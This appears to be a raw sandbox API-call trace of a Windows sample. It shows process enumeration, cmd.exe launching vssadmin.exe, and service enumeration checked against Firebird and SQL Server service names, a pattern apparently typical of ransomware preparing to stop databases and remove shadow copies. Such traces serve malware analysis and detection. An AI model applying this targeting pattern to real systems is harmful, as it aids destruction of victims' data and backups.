th32ModuleID=0x0, cntThreads=0x8, th32ParentProcessID=0x1cc, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0038.725] lstrlenW (lpString="svchost.exe") returned 11 [0038.725] Process32NextW (in: hSnapshot=0x1f8, lppe=0x21dfd34 | out: lppe=0x21dfd34*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x2cc, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x15, th32ParentProcessID=0x1cc, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0038.726] lstrlenW (lpString="svchost.exe") returned 11 [0038.726] Process32NextW (in: hSnapshot=0x1f8, lppe=0x21dfd34 | out: lppe=0x21dfd34*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x334, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x19, th32ParentProcessID=0x1cc, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0038.727] lstrlenW (lpString="svchost.exe") returned 11 [0038.727] Process32NextW (in: hSnapshot=0x1f8, lppe=0x21dfd34 | out: lppe=0x21dfd34*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x36c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x28, th32ParentProcessID=0x1cc, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0038.727] lstrlenW (lpString="svchost.exe") returned 11 [0038.727] Process32NextW (in: hSnapshot=0x1f8, lppe=0x21dfd34 | out: lppe=0x21dfd34*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x3a8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x7, th32ParentProcessID=0x2cc, pcPriClassBase=8, dwFlags=0x0, szExeFile="audiodg.exe")) returned 1 [0038.728] lstrlenW (lpString="audiodg.exe") returned 11 [0038.728] Process32NextW (in: hSnapshot=0x1f8, lppe=0x21dfd34 | out: lppe=0x21dfd34*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x3f8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xf, th32ParentProcessID=0x1cc, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0038.729] lstrlenW (lpString="svchost.exe") returned 11 [0038.729] Process32NextW (in: hSnapshot=0x1f8, lppe=0x21dfd34 | out: lppe=0x21dfd34*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x124, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x14, th32ParentProcessID=0x1cc, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0038.729] lstrlenW (lpString="svchost.exe") returned 11 [0038.729] Process32NextW (in: hSnapshot=0x1f8, lppe=0x21dfd34 | out: lppe=0x21dfd34*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x448, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x6, th32ParentProcessID=0x334, pcPriClassBase=8, dwFlags=0x0, szExeFile="dwm.exe")) returned 1 [0038.730] lstrlenW (lpString="dwm.exe") returned 7 [0038.730] Process32NextW (in: hSnapshot=0x1f8, lppe=0x21dfd34 | out: lppe=0x21dfd34*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x45c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x21, th32ParentProcessID=0x440, pcPriClassBase=8, dwFlags=0x0, szExeFile="explorer.exe")) returned 1 [0038.731] lstrlenW (lpString="explorer.exe") returned 12 [0038.731] Process32NextW (in: hSnapshot=0x1f8, lppe=0x21dfd34 | out: lppe=0x21dfd34*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x480, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x5, th32ParentProcessID=0x1cc, pcPriClassBase=8, dwFlags=0x0, szExeFile="spoolsv.exe")) returned 1 [0038.731] lstrlenW (lpString="spoolsv.exe") returned 11 [0038.731] Process32NextW (in: hSnapshot=0x1f8, lppe=0x21dfd34 | out: lppe=0x21dfd34*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x4ac, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xb, th32ParentProcessID=0x1cc, pcPriClassBase=8, dwFlags=0x0, szExeFile="taskhost.exe")) returned 1 [0038.732] lstrlenW (lpString="taskhost.exe") returned 12 [0038.732] Process32NextW (in: hSnapshot=0x1f8, lppe=0x21dfd34 | out: lppe=0x21dfd34*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x4d4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x16, th32ParentProcessID=0x1cc, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0038.733] lstrlenW (lpString="svchost.exe") returned 11 [0038.733] Process32NextW (in: hSnapshot=0x1f8, lppe=0x21dfd34 | out: lppe=0x21dfd34*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x50c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x7, th32ParentProcessID=0x36c, pcPriClassBase=8, dwFlags=0x0, szExeFile="taskeng.exe")) returned 1 [0038.733] lstrlenW (lpString="taskeng.exe") returned 11 [0038.733] Process32NextW (in: hSnapshot=0x1f8, lppe=0x21dfd34 | out: lppe=0x21dfd34*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x7cc, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xd, th32ParentProcessID=0x1cc, pcPriClassBase=6, dwFlags=0x0, szExeFile="taskhost.exe")) returned 1 [0038.734] lstrlenW (lpString="taskhost.exe") returned 12 [0038.734] Process32NextW (in: hSnapshot=0x1f8, lppe=0x21dfd34 | out: lppe=0x21dfd34*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x59c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="entrepreneur.exe")) returned 1 [0038.735] lstrlenW (lpString="entrepreneur.exe") returned 16 [0038.735] Process32NextW (in: hSnapshot=0x1f8, lppe=0x21dfd34 | out: lppe=0x21dfd34*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x6e4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="andrew kinds.exe")) returned 1 [0038.735] lstrlenW (lpString="andrew kinds.exe") returned 16 [0038.736] Process32NextW (in: hSnapshot=0x1f8, lppe=0x21dfd34 | out: lppe=0x21dfd34*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x440, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="baskets-gazette-arm.exe")) returned 1 [0038.736] lstrlenW (lpString="baskets-gazette-arm.exe") returned 23 [0038.736] Process32NextW (in: hSnapshot=0x1f8, lppe=0x21dfd34 | out: lppe=0x21dfd34*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x660, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="educated.exe")) returned 1 [0038.737] lstrlenW (lpString="educated.exe") returned 12 [0038.737] Process32NextW (in: hSnapshot=0x1f8, lppe=0x21dfd34 | out: lppe=0x21dfd34*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x32c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="servers.exe")) returned 1 [0038.738] lstrlenW (lpString="servers.exe") returned 11 [0038.738] Process32NextW (in: hSnapshot=0x1f8, lppe=0x21dfd34 | out: lppe=0x21dfd34*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x604, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="gibson-necessary.exe")) returned 1 [0038.738] lstrlenW (lpString="gibson-necessary.exe") returned 20 [0038.738] Process32NextW (in: hSnapshot=0x1f8, lppe=0x21dfd34 | out: lppe=0x21dfd34*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x328, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="gbp_chair.exe")) returned 1 [0038.739] lstrlenW (lpString="gbp_chair.exe") returned 13 [0038.739] Process32NextW (in: hSnapshot=0x1f8, lppe=0x21dfd34 | out: lppe=0x21dfd34*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x240, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="attention infected.exe")) returned 1 [0038.740] lstrlenW (lpString="attention infected.exe") returned 22 [0038.740] Process32NextW (in: hSnapshot=0x1f8, lppe=0x21dfd34 | out: lppe=0x21dfd34*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x2c8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="have-oz-barrel.exe")) returned 1 [0038.740] lstrlenW (lpString="have-oz-barrel.exe") returned 18 [0038.740] Process32NextW (in: hSnapshot=0x1f8, lppe=0x21dfd34 | out: lppe=0x21dfd34*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x310, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="pattern amateur.exe")) returned 1 [0038.741] lstrlenW (lpString="pattern amateur.exe") returned 19 [0038.741] Process32NextW (in: hSnapshot=0x1f8, lppe=0x21dfd34 | out: lppe=0x21dfd34*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x318, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="referral.exe")) returned 1 [0038.742] lstrlenW (lpString="referral.exe") returned 12 [0038.742] Process32NextW (in: hSnapshot=0x1f8, lppe=0x21dfd34 | out: lppe=0x21dfd34*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x688, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="copyingseems.exe")) returned 1 [0038.742] lstrlenW (lpString="copyingseems.exe") returned 16 [0038.742] Process32NextW (in: hSnapshot=0x1f8, lppe=0x21dfd34 | out: lppe=0x21dfd34*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x7fc, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="spin generally.exe")) returned 1 [0038.743] lstrlenW (lpString="spin generally.exe") returned 18 [0038.743] Process32NextW (in: hSnapshot=0x1f8, lppe=0x21dfd34 | out: lppe=0x21dfd34*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x7a4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="television consolidated wav.exe")) returned 1 [0038.744] lstrlenW (lpString="television consolidated wav.exe") returned 31 [0038.744] Process32NextW (in: hSnapshot=0x1f8, lppe=0x21dfd34 | out: lppe=0x21dfd34*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x7bc, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="transmit.exe")) returned 1 [0038.744] lstrlenW (lpString="transmit.exe") returned 12 [0038.744] Process32NextW (in: hSnapshot=0x1f8, lppe=0x21dfd34 | out: lppe=0x21dfd34*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x790, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="travel-fits-insights.exe")) returned 1 [0038.745] lstrlenW (lpString="travel-fits-insights.exe") returned 24 [0038.745] Process32NextW (in: hSnapshot=0x1f8, lppe=0x21dfd34 | out: lppe=0x21dfd34*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x7e0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="discipline-netherlands-sail.exe")) returned 1 [0038.746] lstrlenW (lpString="discipline-netherlands-sail.exe") returned 31 [0038.746] Process32NextW (in: hSnapshot=0x1f8, lppe=0x21dfd34 | out: lppe=0x21dfd34*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x408, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="fed_loved_statute.exe")) returned 1 [0038.747] lstrlenW (lpString="fed_loved_statute.exe") returned 21 [0038.747] Process32NextW (in: hSnapshot=0x1f8, lppe=0x21dfd34 | out: lppe=0x21dfd34*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x6f4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="trial_stadium_tr.exe")) returned 1 [0038.747] lstrlenW (lpString="trial_stadium_tr.exe") returned 20 [0038.747] Process32NextW (in: hSnapshot=0x1f8, lppe=0x21dfd34 | out: lppe=0x21dfd34*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x6bc, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="delight.exe")) returned 1 [0038.748] lstrlenW (lpString="delight.exe") returned 11 [0038.748] Process32NextW (in: hSnapshot=0x1f8, lppe=0x21dfd34 | out: lppe=0x21dfd34*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x178, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="within enquiry.exe")) returned 1 [0038.983] lstrlenW (lpString="within enquiry.exe") returned 18 [0038.983] Process32NextW (in: hSnapshot=0x1f8, lppe=0x21dfd34 | out: lppe=0x21dfd34*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x80c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x8, th32ParentProcessID=0x254, pcPriClassBase=8, dwFlags=0x0, szExeFile="WmiPrvSE.exe")) returned 1 [0038.984] lstrlenW (lpString="WmiPrvSE.exe") returned 12 [0038.984] Process32NextW (in: hSnapshot=0x1f8, lppe=0x21dfd34 | out: lppe=0x21dfd34*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0xa2c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x254, pcPriClassBase=8, dwFlags=0x0, szExeFile="dllhost.exe")) returned 1 [0038.984] lstrlenW (lpString="dllhost.exe") returned 11 [0038.984] Process32NextW (in: hSnapshot=0x1f8, lppe=0x21dfd34 | out: lppe=0x21dfd34*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0xa70, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x12, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="agent1c.exe")) returned 1 [0038.985] lstrlenW (lpString="agent1c.exe") returned 11 [0038.985] Process32NextW (in: hSnapshot=0x1f8, lppe=0x21dfd34 | out: lppe=0x21dfd34*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0xa84, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0xa70, pcPriClassBase=8, dwFlags=0x0, szExeFile="cmd.exe")) returned 1 [0038.986] lstrlenW (lpString="cmd.exe") returned 7 [0038.986] Process32NextW (in: hSnapshot=0x1f8, lppe=0x21dfd34 | out: lppe=0x21dfd34*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0xaa4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x3, th32ParentProcessID=0x188, pcPriClassBase=8, dwFlags=0x0, szExeFile="conhost.exe")) returned 1 [0038.986] lstrlenW (lpString="conhost.exe") returned 11 [0038.986] Process32NextW (in: hSnapshot=0x1f8, lppe=0x21dfd34 | out: lppe=0x21dfd34*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0xae0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x5, th32ParentProcessID=0xa84, pcPriClassBase=8, dwFlags=0x0, szExeFile="vssadmin.exe")) returned 1 [0038.987] lstrlenW (lpString="vssadmin.exe") returned 12 [0038.987] Process32NextW (in: hSnapshot=0x1f8, lppe=0x21dfd34 | out: lppe=0x21dfd34*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0xaf8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x5, th32ParentProcessID=0x1cc, pcPriClassBase=8, dwFlags=0x0, szExeFile="VSSVC.exe")) returned 1 [0038.988] lstrlenW (lpString="VSSVC.exe") returned 9 [0038.988] Process32NextW (in: hSnapshot=0x1f8, lppe=0x21dfd34 | out: lppe=0x21dfd34*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0xaf8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x5, th32ParentProcessID=0x1cc, pcPriClassBase=8, dwFlags=0x0, szExeFile="VSSVC.exe")) returned 0 [0038.988] CloseHandle (hObject=0x1f8) returned 1 [0038.989] Sleep (dwMilliseconds=0x1f4) [0039.659] OpenSCManagerW (lpMachineName=0x0, lpDatabaseName=0x0, dwDesiredAccess=0x4) returned 0x3720970 [0039.659] EnumServicesStatusExW (in: hSCManager=0x3720970, InfoLevel=0x0, dwServiceType=0x30, dwServiceState=0x1, lpServices=0x0, cbBufSize=0x0, pcbBytesNeeded=0x21dff44, lpServicesReturned=0x21dff5c, lpResumeHandle=0x0, pszGroupName=0x0 | out: lpServices=0x0, pcbBytesNeeded=0x21dff44, lpServicesReturned=0x21dff5c, lpResumeHandle=0x0) returned 0 [0039.660] GetLastError () returned 0xea [0039.660] RtlAllocateHeap (HeapHandle=0x5f0000, Flags=0x0, Size=0x123e) returned 0x3808fc0 [0039.660] EnumServicesStatusExW (in: hSCManager=0x3720970, InfoLevel=0x0, dwServiceType=0x30, dwServiceState=0x1, lpServices=0x3808fc0, cbBufSize=0x123e, pcbBytesNeeded=0x21dff44, lpServicesReturned=0x21dff5c, lpResumeHandle=0x0, pszGroupName=0x0 | out: lpServices=0x3808fc0, pcbBytesNeeded=0x21dff44, lpServicesReturned=0x21dff5c, lpResumeHandle=0x0) returned 1 [0039.661] CloseServiceHandle (hSCObject=0x3720970) returned 1 [0039.661] lstrlenW (lpString="Appinfo") returned 7 [0039.661] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="Appinfo") returned 1 [0039.661] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="Appinfo") returned 1 [0039.661] lstrcmpiW (lpString1="sqlwriter", lpString2="Appinfo") returned 1 [0039.661] lstrcmpiW (lpString1="mssqlserver", lpString2="Appinfo") returned 1 [0039.661] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="Appinfo") returned 1 [0039.661] lstrlenW (lpString="AudioEndpointBuilder") returned 20 [0039.661] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="AudioEndpointBuilder") returned 1 [0039.661] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="AudioEndpointBuilder") returned 1 [0039.661] lstrcmpiW (lpString1="sqlwriter", lpString2="AudioEndpointBuilder") returned 1 [0039.661] lstrcmpiW (lpString1="mssqlserver", lpString2="AudioEndpointBuilder") returned 1 [0039.661] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="AudioEndpointBuilder") returned 1 [0039.661] lstrlenW (lpString="AudioSrv") returned 8 [0039.661] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="AudioSrv") returned 1 [0039.661] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="AudioSrv") returned 1 [0039.661] lstrcmpiW (lpString1="sqlwriter", lpString2="AudioSrv") returned 1 [0039.661] lstrcmpiW (lpString1="mssqlserver", lpString2="AudioSrv") returned 1 [0039.661] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="AudioSrv") returned 1 [0039.661] lstrlenW (lpString="BFE") returned 3 [0039.661] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="BFE") returned 1 [0039.661] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="BFE") returned 1 [0039.661] lstrcmpiW (lpString1="sqlwriter", lpString2="BFE") returned 1 [0039.661] lstrcmpiW (lpString1="mssqlserver", lpString2="BFE") returned 1 [0039.661] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="BFE") returned 1 [0039.661] lstrlenW (lpString="CryptSvc") returned 8 [0039.661] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="CryptSvc") returned 1 [0039.662] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="CryptSvc") returned 1 [0039.662] lstrcmpiW (lpString1="sqlwriter", lpString2="CryptSvc") returned 1 [0039.662] lstrcmpiW (lpString1="mssqlserver", lpString2="CryptSvc") returned 1 [0039.662] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="CryptSvc") returned 1 [0039.662] lstrlenW (lpString="CscService") returned 10 [0039.662] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="CscService") returned 1 [0039.662] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="CscService") returned 1 [0039.662] lstrcmpiW (lpString1="sqlwriter", lpString2="CscService") returned 1 [0039.662] lstrcmpiW (lpString1="mssqlserver", lpString2="CscService") returned 1 [0039.662] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="CscService") returned 1 [0039.662] lstrlenW (lpString="DcomLaunch") returned 10 [0039.662] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="DcomLaunch") returned 1 [0039.662] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="DcomLaunch") returned 1 [0039.662] lstrcmpiW (lpString1="sqlwriter", lpString2="DcomLaunch") returned 1 [0039.662] lstrcmpiW (lpString1="mssqlserver", lpString2="DcomLaunch") returned 1 [0039.662] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="DcomLaunch") returned 1 [0039.662] lstrlenW (lpString="Dhcp") returned 4 [0039.662] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="Dhcp") returned 1 [0039.662] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="Dhcp") returned 1 [0039.662] lstrcmpiW (lpString1="sqlwriter", lpString2="Dhcp") returned 1 [0039.662] lstrcmpiW (lpString1="mssqlserver", lpString2="Dhcp") returned 1 [0039.662] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="Dhcp") returned 1 [0039.662] lstrlenW (lpString="Dnscache") returned 8 [0039.662] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="Dnscache") returned 1 [0039.662] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="Dnscache") returned 1 [0039.662] lstrcmpiW (lpString1="sqlwriter", lpString2="Dnscache") returned 1 [0039.662] lstrcmpiW (lpString1="mssqlserver", lpString2="Dnscache") returned 1 [0039.662] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="Dnscache") returned 1 [0039.662] lstrlenW (lpString="DPS") returned 3 [0039.662] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="DPS") returned 1 [0039.662] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="DPS") returned 1 [0039.662] lstrcmpiW (lpString1="sqlwriter", lpString2="DPS") returned 1 [0039.662] lstrcmpiW (lpString1="mssqlserver", lpString2="DPS") returned 1 [0039.662] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="DPS") returned 1 [0039.663] lstrlenW (lpString="eventlog") returned 8 [0039.663] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="eventlog") returned 1 [0039.663] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="eventlog") returned 1 [0039.663] lstrcmpiW (lpString1="sqlwriter", lpString2="eventlog") returned 1 [0039.663] lstrcmpiW (lpString1="mssqlserver", lpString2="eventlog") returned 1 [0039.663] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="eventlog") returned 1 [0039.663] lstrlenW (lpString="EventSystem") returned 11 [0039.663] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="EventSystem") returned 1 [0039.663] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="EventSystem") returned 1 [0039.663] lstrcmpiW (lpString1="sqlwriter", lpString2="EventSystem") returned 1 [0039.663] lstrcmpiW (lpString1="mssqlserver", lpString2="EventSystem") returned 1 [0039.663] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="EventSystem") returned 1 [0039.663] lstrlenW (lpString="gpsvc") returned 5 [0039.663] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="gpsvc") returned -1 [0039.663] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="gpsvc") returned -1 [0039.663] lstrcmpiW (lpString1="sqlwriter", lpString2="gpsvc") returned 1 [0039.663] lstrcmpiW (lpString1="mssqlserver", lpString2="gpsvc") returned 1 [0039.663] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="gpsvc") returned 1 [0039.663] lstrlenW (lpString="iphlpsvc") returned 8 [0039.663] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="iphlpsvc") returned -1 [0039.663] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="iphlpsvc") returned -1 [0039.663] lstrcmpiW (lpString1="sqlwriter", lpString2="iphlpsvc") returned 1 [0039.663] lstrcmpiW (lpString1="mssqlserver", lpString2="iphlpsvc") returned 1 [0039.663] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="iphlpsvc") returned 1 [0039.663] lstrlenW (lpString="LanmanServer") returned 12 [0039.663] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="LanmanServer") returned -1 [0039.663] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="LanmanServer") returned -1 [0039.663] lstrcmpiW (lpString1="sqlwriter", lpString2="LanmanServer") returned 1 [0039.663] lstrcmpiW (lpString1="mssqlserver", lpString2="LanmanServer") returned 1 [0039.663] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="LanmanServer") returned 1 [0039.663] lstrlenW (lpString="LanmanWorkstation") returned 17 [0039.663] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="LanmanWorkstation") returned -1 [0039.663] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="LanmanWorkstation") returned -1 [0039.664] lstrcmpiW (lpString1="sqlwriter", lpString2="LanmanWorkstation") returned 1 [0039.664] lstrcmpiW (lpString1="mssqlserver", lpString2="LanmanWorkstation") returned 1 [0039.664] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="LanmanWorkstation") returned 1 [0039.664] lstrlenW (lpString="lmhosts") returned 7 [0039.664] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="lmhosts") returned -1 [0039.664] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="lmhosts") returned -1 [0039.664] lstrcmpiW (lpString1="sqlwriter", lpString2="lmhosts") returned 1 [0039.664] lstrcmpiW (lpString1="mssqlserver", lpString2="lmhosts") returned 1 [0039.664] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="lmhosts") returned 1 [0039.664] lstrlenW (lpString="MMCSS") returned 5 [0039.664] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="MMCSS") returned -1 [0039.664] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="MMCSS") returned -1 [0039.664] lstrcmpiW (lpString1="sqlwriter", lpString2="MMCSS") returned 1 [0039.664] lstrcmpiW (lpString1="mssqlserver", lpString2="MMCSS") returned 1 [0039.664] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="MMCSS") returned 1 [0039.664] lstrlenW (lpString="MpsSvc") returned 6 [0039.664] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="MpsSvc") returned -1 [0039.664] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="MpsSvc") returned -1 [0039.664] lstrcmpiW (lpString1="sqlwriter", lpString2="MpsSvc") returned 1 [0039.664] lstrcmpiW (lpString1="mssqlserver", lpString2="MpsSvc") returned 1 [0039.664] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="MpsSvc") returned 1 [0039.664] lstrlenW (lpString="Netman") returned 6 [0039.664] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="Netman") returned -1 [0039.664] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="Netman") returned -1 [0039.664] lstrcmpiW (lpString1="sqlwriter", lpString2="Netman") returned 1 [0039.664] lstrcmpiW (lpString1="mssqlserver", lpString2="Netman") 